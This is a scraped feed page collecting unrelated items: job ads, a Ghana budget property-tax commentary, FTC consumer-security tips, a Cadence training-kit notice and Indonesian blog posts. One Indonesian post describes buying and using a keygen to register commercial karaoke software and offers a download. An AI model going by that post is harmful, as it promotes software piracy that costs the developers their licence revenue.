omhoog?</li> </ul> <li><strong>Inzichten </strong></li> <ul> <li>Wat zien we in Google Analytics gebeuren en wat voor actie kunnen we hierop ondernemen?</li> <li>Hoe richten we onze rapportages in?</li> </ul> <li><strong>Content </strong></li> <ul> <li>Welke pagina's moeten we verbeteren?</li> <li>Hoe zorgen we dat onze bezoekers meer pagina's bekijken en vaker terug komen?</li> </ul> <li><strong>Campagnes</strong></li> <li>Waar zie je optimalisatie mogelijkheden bij het inrichten van campagnes op holland.com?</li> <li>Welke inzichten halen we voorgaande campagnes en hoe vertalen we dat naar nieuw in te richten campagnes?</li> <li>Welke onsite segmentatie en targeting richten we in?</li> <li>Hoe kunnen we de campagne rapportage nog beter vormgeven en welke inzichten willen we hierin hebben staan?</li> </ul> Wij bieden jou: <ul> <li>Een uitdagende en leerzame stage</li> <li>Veel kansen om hier jouw eigen invulling aan te geven</li> <li>De kans om het leukste product van Nederland te vermarkten</li> <li>Onderdeel te worden van een leuk team waar de medewerkers vooroplopen in hun specialismen</li> </ul> ...
              Database Analyst with SQL   
    Miamisburg, Database Analyst with SQL Miamisburg, OH contract good thru 12/31/17 My client, a leading provider of science and health information technology, publications and journals, is seeking a Database Analyst for an 8th month + contract opportunity. Knowledge and Experience: Bachelor's degree in Information Technology or Computer Science 4 years database management experience Skills and Competencies: ECL
              Stage: Stagiair Database Marketing in Amersfoort   
              Chilling Taxies For The Property Market   
    Last night, I took my eyes off my Study Bible to read Ghana’s 2011 Budget. It was revealing. Some sections were interesting, others were like political grammar. But in this article, I would like to share with you how the 2011 Budget may affect the land and property market. It’s about the government’s proposed property taxes.

    Property Rates
    Just today, I have been hearing media speculations about possible hikes in rent as a result of government’s intention to strengthen administration of property rate. I have a different opinion. Strengthening property rate administration does not necessary mean increasing property rate to be paid by property owners. It may as well mean that property rates that are not been collected will be collected as a result of effective administration. Actually, this is what the budget says.
    “…in many economies, property taxes contribute substantially to revenue mobilization. In Ghana, property taxes make up only 0.03 percent of Ghana’s GDP.” “…there is huge potential for the MMDAs to improve their revenue mobilization through property taxes and be less dependent on the Common Fund in providing local services and amenities.” “…payment of property tax is a civic duty. We need those taxes to improve basic local amenities such as sanitation, water, and street lights. Moreover, the government provides services like police protection and judicial services in order for all of us to enjoy our property peacefully. It is our intent to work with the Ministry of Local Government and Rural Development to strengthen capacity in the administration of property taxes in this country. An improved scheme will be put in place by the end of the first quarter of 2011 to take effect in the second quarter.” “…I wish to propose to this House that in the near future, government releases to the Assemblies may place more weight on their revenue mobilization efforts as reflected in the DACF formula.”
    Does this sound like increasing taxes? In only refers to strengthening property rate administration. I think if revenue mobilized from property rates would be used to improve the standard of living of every living Ghanaian, then it must be paid.

    No Tax Holidays for Real Estate Developers
    Another hullabaloo that I expect but has not come yet is from real estate developers, like GREADA. Why are they not talking about government’s intention to take away the five years tax exemptions like they did with the STX deal? Or is it that they fear of been charged with “causing fear and panic”?
    What am talking about is what the 2011 Budget provides at item 143 that, “…the five years exemption period granted to companies engaged in the construction for letting or sale of residential premises under Section 11(6) of Act 592 was mainly to create affordable accommodation for the middle to low income earners. Unfortunately, the real estate developers focused on building for the high and upper class of the society while abandoning the original purpose. The government proposes to abolish the general five year tax exemption for real estate developers. However, given government’s heavy involvement with the provision of affordable housing, real estate developers who partner the Ministry of Works and Housing to provide affordable houses will continue to benefit from the five year exemption.”
    Why are real estate developers quiet? I should think that may be they are preparing their petition to parliament.

    Taxing Land Professionals
    Another group of people to receive a chill from the Budget are individual land professionals such as real estate consultants, valuers, land surveyors and quantity surveyors. According to the Budget, “Ghana has many self-employed professionals who are contributing to economic development through the provision of professional services. Indeed it is very satisfying to note that on several government projects we have had opportunity to use our own competent professionals working in consultancy capacities. Knowing the level of fees paid for such services in the private sector, we think that it is the responsibility of these professionals to also contribute their quota as required by law and discharge their civic responsibility with regard to the payment of taxes. We are aware that a small but significant group of such professionals have conscientiously discharged their responsibility to the state. We want to acknowledge and recognize them, and at the same time create a conducive administrative framework for others to follow suit.”
    It continues that “…we want to encourage the voluntary compliance of professionals in their tax payments as a civic responsibility. Beginning 2011, Government will focus attention on the revenue contribution from the self-employed group with special emphasis on professionals. A special desk will be established in the Domestic Tax Division of the Ghana Revenue Authority to monitor compliance of professionals in their tax payments. The GRA will coordinate monitoring from the district level, reconcile data with the Registrar General‟s Department to develop the necessary databases to facilitate monitoring, seek data from the recognized professional bodies, and assess current enforcement procedures.”
    The Ghana Institution of Surveyors, Ghana Institute of Planners, Ghana Institute of Architects must begin to assimilate the provisions of the budget and see how it may affect consultancy services of individual members. This is area worth discussing at conference of such professional bodies.

    Gift Tax Increased
    “…Gift Tax moves in tandem with general Income Tax including Capital Gains Tax. Since Capital Gains Tax has been increased from 5 percent to 15 percent [Internal Revenue (Amendment) Act, 2010 Act 797] it is only proper to do the same for Gift Tax. In this regard, an increase in gift tax to be in tandem with general income tax is being proposed. This will avoid shifting of Capital Gains to Gift Tax.”

    These are just policies. It is their implementation that would matter. It is their implementation that would determine how deep these proposed properties taxes may prick the land and property market.

              Info I wish I had before Today   

    Stop Unsolicited Mail, Phone Calls, & Email

    Tired of having your mailbox crammed with unsolicited mail, including preapproved credit card applications? Fed up with getting telemarketing calls just as you're sitting down to dinner? Fuming that your email inbox is chock-full of unsolicited advertising? The good news is that you can cut down on the number of unsolicited mailings, calls, and emails you receive by learning where to go to "just say no."

    Direct Marketers



    Mail & Email

     or mail your request with a $1 processing fee to:
    Direct Marketing Association
    P.O. Box 643
    Carmel, NY 10512

    Cell Phones and The Do Not Call Registry

    Despite viral email, there is no new cell phone database.
    Consumers may place their cell phone number on the National Do Not Call Registry to notify marketers that they don't want to get unsolicited telemarketing calls.
    The truth about cell phones and the Do Not Call Registry is:
    • The government is not releasing cell phone numbers to telemarketers.
    • There is no deadline for registering a cell phone number on the Do Not Call Registry.
    • Federal Communications Commission (FCC) regulations prohibit telemarketers from using automated dialers to call cell phone numbers without prior consent. Automated dialers are standard in the industry, so most telemarketers are barred from calling consumers' cell phones without their consent.
    • There is only one Do Not Call Registry, operated by the Federal Trade Commission (FTC), with information available at donotcall.gov. There is no separate registry for cell phones.
    • The Do Not Call Registry accepts registrations from both cell phones and land lines. To register by telephone, call 1-888-382-1222 (TTY: 1-866-290-4236). You must call from the phone number that you want to register. To register online (donotcall.gov), you will have to respond to a confirmation email.
    • If you have registered a mobile or other telephone number already, you don't need to re-register. Once registered, a telephone number stays on the Do Not Call Registry until the registration is canceled or service for the number is discontinued.

    Computer Security


    "Free" Security Scans

    Alarming messages on your computer warning that a ‘free’ scan has found malware could be a rip-off.

    Computer Security

    Secure your computer and protect yourself from hackers, scammers, and identity thieves.

    Cookies: Leaving a Trail on the Web

    This Q&A can help answer questions you have about cookies and online tracking.

    Disposing of Old Computers

    Getting rid of a computer? Follow these instructions to protect your personal information.

    Hacked Email

    What to do if you think your email or social networking account has been hacked.

    Laptop Security

    Here’s how to prevent a thief from snatching your laptop — and all the valuable information it houses.


    Steps you can take to avoid, detect, and get rid of viruses and spyware

    P2P File-Sharing Risks

    Consider these computer security risks before you share files through a P2P network.


    What to do about messages that ask for your personal information

    Tech Support Scams

    Who is calling out of the blue, claiming to be able to "fix" your computer? A scammer, that’s who.


    Apps to Help You Shop in Stores

    What to know about apps that help you make purchases and find deals in brick-and-mortar stores

    Disposing of Your Mobile Device

    Dispose of your mobile phone safely.

    Understanding Mobile Apps

    Consider these questions before you download a mobile app.

    Using IP Cameras Safely

    When you shop for an internet camera, put security features at the top of your list. Here are tips to help.


    Securing Your Wireless Network

    Protect the wireless network in your home.

    Tips for Using Public Wi-Fi Networks

    Here’s how you can protect your personal information when you’re using public Wi-Fi hotspots.

    All information in this article has been provided by 


              How much for a good commercial website for a book publisher?   
    About how much should I budget to hire someone to redesign my website (I work for a small press, so it's like a book catalog) and provide me with a custom word press (or other type of blogging software) blog type front page as well as a database driven book catalog (300 plus, a page for each book)? I'd need a fairly robust back end so I could manage the content myself and I'd like to do direct sales as well, so a shopping cart and ssl set up and the like.

    Just ballpark is fine, two thousand bucks? Five thousand? Any suggestions for where I could find someone to do that?

    I currently have a website that does all this, but for various reasons want to switch up, I have a pretty good export of all the data from my current site.

              Good webhost?   
    What is a good price to pay for webhosting, database and a secure shopping cart? Hello Smarties,
    I'm looking into switching a web catalog and direct sales to a new host. I would need something that was fairly robust and reasonably slick in terms of a basic (no flash or la-tee-dah) presentation of a book catalog, with direct secure sales. It would need a database backend (speaking of which any recomendations, including among yourselves for someone who could hook me up? email: divinewino@gmail.com). I would love a gateway interface with my cc processor as well. How much should I be looking to pay for reasonable bandwidth, email and the server(s)? Any reccomendations for trustworthy people? I'd happily pay a little premium for a smaller shop that paid attention to me.

              Charity website sued over hate group labels on nonprofits   

    NEWPORT NEWS, Va. (AP) — A Florida-based legal advocacy organization is suing over a “hate group” label that it and other nonprofits received on a website that maintains a database of information about U.S. charities. Liberty Counsel Inc. filed a federal lawsuit Wednesday against GuideStar USA Inc. in Newport News, Virginia. GuideStar flagged 46 nonprofits, […]
              Low-Power IEEE 1801 / UPF Simulation Rapid Adoption Kit Now Available   

    There is no better way other than a self-help training kit -- (rapid adoption kit, or RAK) -- to demonstrate the Incisive Enterprise Simulator's IEEE 1801 / UPF low-power features and its usage. The features include:

    • Unique SimVision debugging 
    • Patent-pending power supply network visualization and debugging
    • Tcl extensions for LP debugging
    • Support for Liberty file power description
    • Standby mode support
    • Support for Verilog, VHDL, and mixed language
    • Automatic understanding of complex feedthroughs
    • Replay of initial blocks
    • ‘x' corruption for integers and enumerated types
    • Automatic understanding of loop variables
    • Automatic support for analog interconnections


    Mickey Rodriguez, AVS Staff Solutions Engineer has developed a low power UPF-based RAK, which is now available on Cadence Online Support for you to download.

    • This rapid adoption kit illustrates Incisive Enterprise Simulator (IES) support for the IEEE 1801 power intent standard. 

    Patent-Pending Power Supply Network Browser. (Only available with the LP option to IES)

    • In addition to an overview of IES features, SimVision and Tcl debug features, a lab is provided to give the user an opportunity to try these out.

    The complete RAK and associated overview presentation can be downloaded from our SoC and Functional Verification RAK page:

    Rapid Adoption Kits


    RAK Database

    Introduction to IEEE-1801 Low Power Simulation


    Download (2.3 MB)


    We are covering the following technologies through our RAKs at this moment:

    Synthesis, Test and Verification flow
    Encounter Digital Implementation (EDI) System and Sign-off Flow
    Virtuoso Custom IC and Sign-off Flow
    Silicon-Package-Board Design
    Verification IP
    SOC and IP level Functional Verification
    System level verification and validation with Palladium XP

    Please visit https://support.cadence.com/raks to download your copy of RAK.

    We will continue to provide self-help content on Cadence Online Support, your 24/7 partner for learning more about Cadence tools, technologies, and methodologies as well as getting help in resolving issues related to Cadence software. If you are signed up for e-mail notifications, you're likely to notice new solutions, application notes (technical papers), videos, manuals, etc.

    Note: To access the above documents, click a link and use your Cadence credentials to log on to the Cadence Online Support https://support.cadence.com/ website.

    Happy Learning!

    Sumeet Aggarwal and Adam Sherer

              Laboratory Technologists at Kenya Medical Research - KEMRI   
    Kenya Medical Research Institute (KEMRI) is a State Corporation established through the Science and Technology (Amendment) Act of 1979, which has since been amended to Science, Technology and Innovation Act 2013. The 1979 Act established KEMRI as a National body responsible for carrying out health research in Kenya. To provide technical support to research teams in the set up of laboratory experiments, analysis of samples/data and recording of applied processes and procedures in order to meet clinical research objectives. Duties for the Laboratory Technologists Job Conduct experiments, interpret and document results through the use of routine and basic laboratory procedures involving manual techniques or use of laboratory instruments. Standardise, calibrate and carry out preventive maintenance and basic troubleshooting on laboratory equipment and instrument. Receive samples and ensure that relevant support documentation is provided and process in line with relevant QC guidelines; document sample and process information. Liaise with Nurses, clinicians, health care workers and public in order to ensure that relevant samples are taken/ provided, resolve discrepancies and to communicate results in line with laid down procedures. Participate in various QAQC, EQA, IQC and regulatory agency activities within the assigned section, including developing and documenting QC monitors. Provide technical advice to researchers in the design of experiments. Set up laboratory equipment and experiments and guide researchers on use of laboratory equipment. Prepare and collate results, update relevant databases and prepare reports as may be required. Monitor lab resources and inform relevant staff on the replenishment. Manage and dispose of waste in line with laid down guidelines including segregation and use of specified waste disposal facilities. Continually comply with all laid down QMS guidelines/ standards/ SOPs and comply with all health and safety guidelines. Supervise field teams as required including allocation of tasks and responsibilities to assigned field And any other duties that may be assigned from time to time. Laboratory Technologists Job Qualifications A Diploma in Medical Laboratory Sciences Registered with the Kenya Medical Laboratory Technicians and Technologists Board Knowledge and understanding of GCLPs and regulatory/ accreditation agency requirements Knowledge of laboratory Health and Safety practices Computer literacy with proficiency in Microsoft applications
              Secretary/Receptionist at Tupelo   
    Tupelo is a reputable medium sized restaurant based in upper hill, Nairobi, Kenya and wishes to urgently fill the following positions: Roles for the Secretary/Receptionist Job Provide secretarial assistance such as - arrange appointments, schedule meetings, receive visitors, screen phone calls, and respond to requests for information. Maintain and update files and retrieve relevant information as and when required. Maintain database, visiting cards, address, telephone numbers etc. Proficient in Microsoft Office programs, email and internet. Secretary/Receptionist Job Requirements Relevant Diploma/Certificate A minimum of 2 years experience in a similar role Knowledge of Secretarial Practice and Front Office Coordination. Ability to multi-task, organizes, prioritize and communicate Proficient in Microsoft Office programs, email and internet. Excellent verbal and written communication skills in English. Well groomed, presentable, friendly and confident Excellent customer service and good telephone etiquette
              Business Development Manager at Mission Aviation Fellowship   
    Mission Aviation Fellowship is a not-for-profit, Christian organisation whose mission is to reach isolated communities through aviation. In Kenya we fly small aircraft to assist Mission organisations, Churches and Relief agencies in providing humanitarian and spiritual sustenance to isolated people. The primary purpose of the position is to increase the impact and scope of flight operations in Kenya, especially those from our new sub-base in Marsabit. The successful candidate will do this by close interaction with partners (both existing and prospective) and tailoring MAFs flight solutions to the existing and future needs of isolated people in Kenya. Business Development Manager Job Responsibilities To understand the scope of the spiritual and humanitarian needs in Kenya: Monitor various sources of information to build up a picture of the needs. Create a database/knowledge base of information relating to spiritual and humanitarian needs and partner activity. Identify gaps in the provision of spiritual and humanitarian engagement with isolated people in Kenya, and create opportunities for MAF to proactively engage with partners to fill these gaps. To develop strategic opportunities for MAF in Kenya by: Strengthening partnerships with current partner organisations (customers) Working with current partners to increase the provision of flight services, and to create new opportunities for MAF to add value to their ministries Identify and develop relationships with new partner organisations, and seek to develop opportunities to add value to their operations/ministries through the provision of MAF air services. Develop and maintain a social media presence in relation to MAFs current flight activities in Kenya Speak on behalf of MAF at Churches, business meetings, forums and other events To undertake the day to day management of the business development task by: Carrying out surveys, talking to passengers, arranging meetings with decision makers in partner organisations Maintaining a database of partner information including their activities, future plans, past flight activity and trends. Creating draft flight proposals for partners, proposing new routes for shuttle flights, pursuing 'Memorandum of Understanding' agreements with partners Develop SMS, Whatsapp, email and other avenues for sharing availabiltiy of spare seats, payload and flight legs. To foster Partnership Development by: Building strategic alliances and collaborative networks with other organisations in order to increase the impact of MAF services Maintaining an up to date and thorough understanding of MAF's operations in Kenya Working as part of the team to implement and embed agreed procedures and processes where relevant. Qualifications for the Business Development Manager Job University education or equivalent experience in business development Aptitude in verbal, numerical and abstract reasoning Demonstrated ability to be able to build and maintain good relationships with all levels of the organisation Valid driver's license Personal Qualities: Excellent communication skills including public Speaking Strong interpersonal skills Self-starter, strategist, analytical, commercially focused and a team player Conditions: Job Type: Fixed Term Contract for 1 yearJob Location: Nairobi with frequent travel to Marsabit. Personal Attributes:There is an occupational requirement for the post holder to be a born again and committed Christian
              Community Development – Programme Officer II at Kenya Water Towers Agency   
    KWTA has specific core functions. Its main function is to co-ordinate and oversees the protection, rehabilitation, conservation,and sustainable management of water towers. The Agency also co-ordinates and oversees the recovery and restoration of forest lands, wetlands and biodiversity hotspots. It has the responsibility of promoting the implementation of livelihood programs in the water towers in accordance with natural resource conservation laws.Level: KWT 7 This is the entry point for Diploma holders. Officers in this cadre will report to the Senior Programme Officer Community Development. Programme Officer Job Responsibilities Preparing documentation including writing/editing short articles and other materials regarding projects and programmes; Preparing procurement requests for good/services that require prior funding for agency approval; Compiling and maintaining database of Community groups and other stake holders; Participating in distribution of information that promote the role of Water to community and broader public; Participating in work planning and project implementation; Preparing meeting venues for proposal review, submission, and administration which involve community and the Agency; Data collection for and analysis and project/ Programme Monitoring. Qualifications for the Programme Officer Job At least a KCSE certificate with a minimum grade C plain A Diploma in Social work, Community Development, Business Administration or Business Management, Project management, Natural Resources Management, Monitoring and Evaluation or any other related fields from a recognized institution Have relevant computer applications skills Demonstrate communication and leadership skills Meet the requirements of Chapter Six (6) of the Constitution of Kenya on Leadership and Integrity
              Data Officer I at Kenya Water Towers Agency   
    KWTA has specific core functions. Its main function is to co-ordinate and oversees the protection, rehabilitation, conservation,and sustainable management of water towers. The Agency also co-ordinates and oversees the recovery and restoration of forest lands, wetlands and biodiversity hotspots. It has the responsibility of promoting the implementation of livelihood programs in the water towers in accordance with natural resource conservation laws.Level: KWT 6 The Officer will report to the Assistant Director Ecosystem Assessment. Data Officer Job Responsibilities Assisting in acquisition and management of spatial datasets for all the water towers; Assisting in development of a spatial database for all the water towers using software's such as Post GIS, SQL Server, mobile servers etc.; Contributing in mapping and modeling of Water Towers ecosystem services Assisting in assessment of land cover and land use trends in all the water towers; Contributing in assessment of water towers ecological integrity and map priority rehabilitation sites; Developing cartographic products and spatial data to support development of the Water Towers status reports and other KWTA activities; Assisting in development of the Water Towers Status Report and Directorate's quarterly/annual reports; Undertaking field data collection, processing, archiving and dissemination of information; Contributing in development of a data platform and web based information access and visualization on the status of Water Towers; Assisting in development of innovative technologies for assessing, monitoring and evaluating status of the Water Towers; Supporting in training staff and stakeholders on acquisition of data using GIS and Remote sensing technology. Qualifications for the Data Officer Job Be in possession of a Bachelor's degree in any of the following fields:-Natural Resource Management, Ecology, Environmental Planning, Environmental Economics, Environmental Science or any other relevant field. Have two years (2) of relevant work experience Have demonstrated professional competence, leadership qualities as well as good understanding of Natural Resources sector; Demonstrate good understanding field and secondary data collection; Practical and theoretical knowledge on GIS and Remote Sensing data analysis will be added advantage; Have relevant computer applications skills Demonstrate communication and leadership skills Meet the requirements of Chapter Six (6) of the Constitution of Kenya on Leadership and Integrity.
              SECRETARY at Jaramogi Oginga Odinga University of Science and Technology   
    Jaramogi Oginga Odinga University of Science and Technology is located in Bondo in Kenya. It is named for independence leader and Kenya's first Vice-President Jaramogi Oginga Odinga.GRADE 8 - JOOUST/SEC/ADM/2017 KCSE Grade C or its equivalent with a credit in English Language Business English III Commerce II Secretarial Duties II Office Management III Shorthand III (minimum 120wpm) or Audio Typewriting III Typewriting 50 wpm Should have certificates in and be able to use Word Processing, Spreadsheets and Database Management packages At least three (3) years' experience as Senior Secretary Grade 7
              Post-doctoral Scientist – Farming Systems Analysis at International Livestock Research Institute (ILRI)   
    The International Livestock Research Institute (ILRI) works to improve food security and reduce poverty in developing countries through research for better and more sustainable use of livestock. ILRI is a CGIAR research centre - part of a global research partnership for a food-secure future. Responsibilities: Improve the current data management system used for our farm household survey toolset (i.e. RHoMIS, the Rural Household Multiple Indicator Survey, http://rhomis.net), further develop the existing standardised/automated analysis code and develop an online system for survey generation Application of RHoMIS in a range of different projects in Bangladesh, Cambodia, Burkina Faso, Ethiopia, DRC and Burundi Analyse of the data and report results to support targeting and evaluation of ongoing role out of technological interventions Develop avenues to increase the uptake of RHoMIS by small and medium sized iNGOs Analysing the overall database that is currently being set up using RHoMIS applications across the developing world to identify generic drivers of food and nutritional security Contribution to the development of new research proposals Publication of the results of his/her research in peer-reviewed international journals. Requirements: PhD in agronomy, social sciences or environmental sciences Extensive experience with farm household survey tools Extensive working experience in developing countries Strong quantitative skills Track record of publishing peer-reviewed articles Extensive work experience in developing countries in Africa, Asia or Latinamerica Programming knowledge of ODK and R Post location: The position will be based in Nairobi, KenyaPosition level: Post-doctoral level.Duration: The position is on a 2 years fixed term contract.Benefits: ILRI offers a competitive salary and benefits package which includes medical insurance, life insurance and allowances for: education, housing, home leave, and annual holiday entitlement of 30 days + public holidays.
              Data Management Assistant at International Rescue Committee   
    The International Rescue Committee is a global humanitarian aid, relief and development nongovernmental organization. Job Purpose / Objective: The position will be based in the filed site and will work closely with the field teams to improve program quality through improved data management systems and processes. Under the supervision of the Monitoring and Evaluation Manager, the Data Management Assistant shall be responsible for collection, summarizing, compiling and dissemination, storing and timely reporting of all forms of data generated from the activities of the Health programs with a key focus on generation and submission of timely qualitative and quantitative reports.Key Responsibilities Collate, clean and analyze data on Flu, Acute Febrile Illness, and diarrhea surveillance data. Apply appropriate statistical analysis tools and methods for routine and ad-hoc analysis of cross-sectional as well longitudinal data. Generate regular reports used by health program staffs for Monitoring & Evaluation purposes Work with the M&E and program staff to develop and provide the required data collection tools and computer based data management & reporting system Continuous and frequent close monitoring / supervision of all levels of data collection from entry, filling, compiling, summarizing and giving feedback to M&E Manager and Clinical Services Manager Synchronize mobile phone data capture with desktop application and servers Regularly update data after cleaning. Participate actively in the enforcement of Quality Assurance (QA), Quality Control (QC) and Quality Improvement (QI) measures for health program interventions Any other duty that may be assigned by the M&E Manager. Required Qualifications: Degree / Higher Diploma in Health Records/Information Management, Computer Science, Statistics, IT, Health Sciences or other related field. Required Experience & Competencies: Good knowledge of monitoring and evaluation technologies, techniques, approaches and methodologies in health programs. Interest and/or experience in clinical or public health research/program Computer literacy with possible advanced Ms Word, Ms Excel, Ms PowerPoint and Ms Access Relational database is required. Excellent Knowledge of EPI INFO, is required Ability to plan and organize workflow is essential Proficiency in data handling and management Good analytical, planning, teamwork, leadership and inter - personal skills. Strong communication skills; oral, written and presentation skills. Ability to work under minimal supervision in difficult environmental conditions Must be flexible and culturally sensitive Self-motivated to get work completed under tight deadlines will be a key attribute
              Procurement Officer at International Potato Center   
    The International Potato Center, known by its Spanish acronym CIP, was founded in 1971 as a root and tuber research-for-development institution delivering sustainable solutions to the pressing world problems of hunger, poverty, and the degradation of natural resources. CIP is truly a global center, with headquarters in Lima, Peru and offices in 20 developing countries across Asia, Africa, and Latin America. Working closely with our partners, CIP seeks to achieve food security, increased well-being, and gender equity for poor people in the developing world. CIP furthers its mission through rigorous research, innovation in science and technology, and capacity strengthening regarding root and tuber farming and food systems. CIP is part of the CGIAR Consortium, a global partnership that unites organizations engaged in research for a food secure future. CGIAR research is dedicated to reducing rural poverty, increasing food security, improving human health and nutrition, and ensuring more sustainable management of natural resources. Donors include individual countries, major foundations, and international entities. The Procurement Officer will be responsible for supporting the Senior Procurement Officer to support CIP Regional office to offer effective and efficient procurement and logistics services. Duties and Accountabilities: Identify new suppliers and derivative products by constant market follow up, call for bids and acquire the best suppliers that will guarantee an optimum supply chain; Identify and implement alternatives for purchase sources, to minimize costs, time, and warehouse inventory levels; Determine purchase strategies to secure a cost-effective long term supply chain; Prepare and conduct contract negotiations for medium and large volumes; Monitor and control agreements with suppliers, and keep in touch with key contacts; Organize and monitor acquisitions, following standard processes and track product flow from origin to final delivery; Create and maintain contact with internal customers, in-order-to assist them with technical queries/ requests, agreed standards and deadlines; Process documentation for execution of logistics operations, taking appropriate actions to resolve operational issues; Register and maintain logistic database in corporate system for successfully tracking of information; Work capacity under pressure; Interpret data on logistics elements (supply chain management, strategic sourcing or distribution) for decision making.
              Dzone Xtreme Karaoke 8 Pro 2016   
    Assalamu'alaikum Wr.Wb,
    Salam Sejahtera untuk seluruh sobat dimanapun berada... Akhir-Akhir ini banyak sobat diresahkan dengan salah satu software karaoke yang yang sangat sulit untuk mendapatkan keygennya.... Tidak sedikit para sobat yang menghubungi saya lewat Email, Facebook dan telepon untuk minta tolong dicarikan keygen atau serial registrasi untuk software karaoke yang bernama DZONE XTREME 8 PRO 2016... kebetulan software dan keygen tersebut saya tidak punya dan tidak ada niatan sedikitpun untuk memiliki software atau keygen apalagi membajak dari software karaoke DZONE XTREME 8 PRO 2016..

    KENAPA dan MENGAPA.... Karena Saya tidak ingin mengganggu kreasi anak bangsa, Dan saya menghormati, menghargai dan bangga atas karya-karya anak bangsa indonesia.
    Karena sering banyaknya Inbox Email, Facebook dan telepon dari sobat yang minta tolong untuk dicarikan software beserta keygen DZONE XTREME 8 PRO 2016 dan akhirnya sayapun mencoba untuk melobi dan mencoba minta software beserta keygen DZONE XTREME 8 PRO 2016 dari sobat-sobat blogger di seluruh tanah air.

    Dan Akhirnya selang beberapa hari ada salah satu sobat blogger dari Jakarta berkenan memberikan keygen dari software karaoke DZONE XTREME 8 PRO Dengan Harga yang tidak terlalu menguras isi dompet hehehehehe.... ALHAMDULILLAH ...

    Tak lama kemudian saya mencoba untuk instal software karaoke DZONE XTREME 8 PRO dan saya mencoba aktivasi software tersebut menggunakan keygen yang diberikan oleh sobat blogger dari Jakarta, Dan hasilnya TRALALAAAAA..... REGISTRASI DZONE XTREME 8 PRO SUKSES..... ALHAMDULILLAH hehehehehe.... berarti sobat blogger dari Jakarta tidak membohongi saya... Alangkah mulianya hati beliau... Saya do'akan semoga sobat saya Beserta Keluarga yang berada di Jakarta selalu dalam perlindungan ALLAH SWT... AMIN.

    • Support Untuk Dual Layer
    • Tampilan Layar Monitor  
    • Single Layer
    • Smart Import Lagu
    • Score   


    1.      Installasi mudah dan tidak perlu seting apapun, bahkan bisa di buat portable
    2.      Auto import database song with various paterns ( bisa import penamaan file otomatis )
    3.      Change Skin what you see is what you get ( WYSIWYG ) - Skin bisa di custom sendiri
    4.      Multi monitor display or Single Layer ( Tinggal pilih software karaoke single atau multi layar
    5.      DSP and crossfade
    6.      Video Preview
    7.      Arrange Playlist song
    8.      Ada 2 versi : Versi Pro Keyboard/touch screen atau Remote QWERTY
    9.      Bisa remote melalui Android
    10.      Movie Player sudah termasuk play FLV dan BLUE-RAY Film
    11.      No change monitor Resolution ( Tinggal ganti wall.jpg sesuai ukuran resolusi monitor yang di gunakan )
    12.      Memainkan hampir semua format multimedia file ( Installing Klite Code 9.40 Full )
    13.      Random Scoring
    14.      Kelebihan lain yang ada di software lain sudah di masukan pada dzone karaoke
    15.      Auto resolution ( Bisa berjalan pada resolusi berapapun )
    16.      Recording Music + Voice ( Anda bisa merekam suara anda dan music ke format MP3 )
    17.      Load / Save Playlist dalam format Microsoft Excel ( XLS )
    18.      Auto Startup bisa di seting ON/OFF
    19.      Auto Lock Keyboard bisa di seting ON/OFF
    20.      Running Text bisa di ganti sesuai keinginan anda
    21.      Auto touch screen ( Jika mengunakan monitor touch screen otomatis tanpa seting )
    22.      Sound Effect untuk meramaikan suasana saat berkaraoke
    23.      Password keluar software karaoke, bisa di ganti-ganti dan ON/OFF
    24.      Shorcut hot key untuk mempermudah pengoperasian software karaoke ( F1 - F12 )
    25.      Support HDMI ( ON/OFF )
    26.      Software karaoke paling mudah, lengkap, ringan dan elegant 

    Langsung saja, Jika Sobat ingin langsung mencoba software karaoke DEZONE XTREME 8 PRO 2016 tersebut, Silahkan Sobat kllik Link download yang sudah saya sediakan dibawah ini :

    download file



              Cowok Yang Jago Komputer Itu Kren   

    Tampaknya jago komputer hanya seperti mode atau tren yang diejek di satu hari, berikutnya, kita tidak bisa merasa cukup.  Kita semua menarik perbandingan antara jago komputer, kacamata tebal, seorang fiksasi Nintendo dan bakat sosial penyu. Tapi itu dulu, dan ini adalah sekarang …


    Cowok Yang Jago Komputer Itu Kren
    Cowok Yang Jago Komputer Itu Kren


    Pria jago komputer sangat lucu dengan cara yang unik. Wanita suka yang unik dan lucu, itu menarik. Dan, itu merupakan perubahan menyegarkan untuk kencan dengan pria jago komputer, mengingat obsesi pria untuk punya tubuh indah tampak seperti NERAKA. Seorang gadis akan lebih suka kencan dengan seseorang yang lucu dan menarik daripada pria yang lebih peduli tentang apakah ia tampak baik dalam kemeja barunya.

    jago komputer adalah orang berguna di zaman baru di abad 21. Ada frustrasi universal bersama antara pemilik komputer pribadi bila mereka rusak. Komputer hang dan kerusakan adalah salah satu perangkat yang paling membuat frustasi. Solusi? Minta jago komputer untuk memperbaikinya!

    So...? Hahahaha.. Yang Jago Komputer its oke banget dech....

    Sedikit Tambahan

    harus diketahui seorang pria ahli komputer mengenai komputer..:

    1. Kita Musti Menghibur Suasana Wanita Dari "Virus" Bete Dengan "Menscannya" Dengan Kata-Kata Kita Yang Telah terupdate "Databasenya Enginenya".

    2. Kita Musti Ngasih Sisa "Free Space" Hati Kita Untuk Wanita....., Agar Si Wanita Selalu Di Hati Kita.

    3. Kita Harus Merestart System Hati Kita, Ketika Sudah Ada Tanda-Tanda Suasana "OverHate" Dengan Wanita. Kalo Kamu Nggak Restart System Hatimu Ketika sedang Overheat, Lama-Lama Si Wanita Bakal "Terdelete" Dari Hardisk Hati Kita. Dan Bisa Membawa Virus Baru Lagi Yang Mempunya Varian nama : Patah Hati. Virus Ini Biasanya Sulit Untuk Dihapus, Kecuali Ada Wanita Lain Yang Mengisi Hardisk Hatimu

    4. Jangan Lupa Selalu Ganti "Theme" Kamu, Karena, Si Wanita Kadang-Kadang Suka Bosen Dengan Theme Yang Itu-Itu Aja. Cobalah Pake theme Yang Terbaru And Cool, Seperti "Themenya Window Vista".

    5. Ketika "Koneksimu" dengan Si Wanita Bermasalah, Cobalah Kamu Cek Kabel Networkmu, Jika Ga ada Yang Bermasalah Tapi tetep Ga Bisa, Coba Ketik Ini Di "Ms DOs" Hapemu "ping kamu_dimana ?" jika yang tertulis request time out, berarti rasa sayangnya udah mulai memudar, tapi kalo tulisannya, "can't find host server" berarti dia udah ga sayang ama kamu.

    6. Kalo Para Wanita Ga Mau Masuk Ke "Systemmu", Berarti Systemmu Jelek, Banyak Virusnya, Hardwarenya Butut, Ganti Yang Baru dech, Dijamin PAra Wanita Akan Dengan Mudah Masuk Ke Systemmu....good luck
              Developing Applications to Enhance Law Enforcement Operations   

    To commemorate Law Enforcement Appreciation Day, FirstNet presents a blog on the efforts by a California law enforcement officer to develop applications “by officers for officers”.
